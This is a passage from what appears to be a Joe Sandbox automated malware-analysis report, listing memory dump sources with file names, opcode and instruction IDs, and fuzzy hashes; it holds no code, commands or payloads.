                                                  • Source File: 00000000.00000002.4107806852.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1970000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (hq
                                                  • API String ID: 0-4060669308
                                                  • Opcode ID: f56cb3737e0daca07a77f0c99506284deecab72265e025cec09c27674b7ce27f
                                                  • Instruction ID: daa905a505050565d037fd1ff4d0e322b613eda2969aae86eb8a3dd682087624
                                                  • Opcode Fuzzy Hash: f56cb3737e0daca07a77f0c99506284deecab72265e025cec09c27674b7ce27f
                                                  • Instruction Fuzzy Hash: 2D518C74E10209CFDB18DFA8C884BAEBBF5FF98310F248469E509AB391D774A841CB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107806852.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1970000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b14c2d736fc4b0681eb60dcdb1985a9b7cd6959514b979491cfdda7183d26606
                                                  • Instruction ID: be0225108600b9e6ccefffa8ed08637416e2c83e9408227c571d80edf9f0d7b6
                                                  • Opcode Fuzzy Hash: b14c2d736fc4b0681eb60dcdb1985a9b7cd6959514b979491cfdda7183d26606
                                                  • Instruction Fuzzy Hash: D6414D3091070ADFDB15EFA9C484A9DBBF1FF89310F14C669D449BB265EB70A981CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4107806852.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1970000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity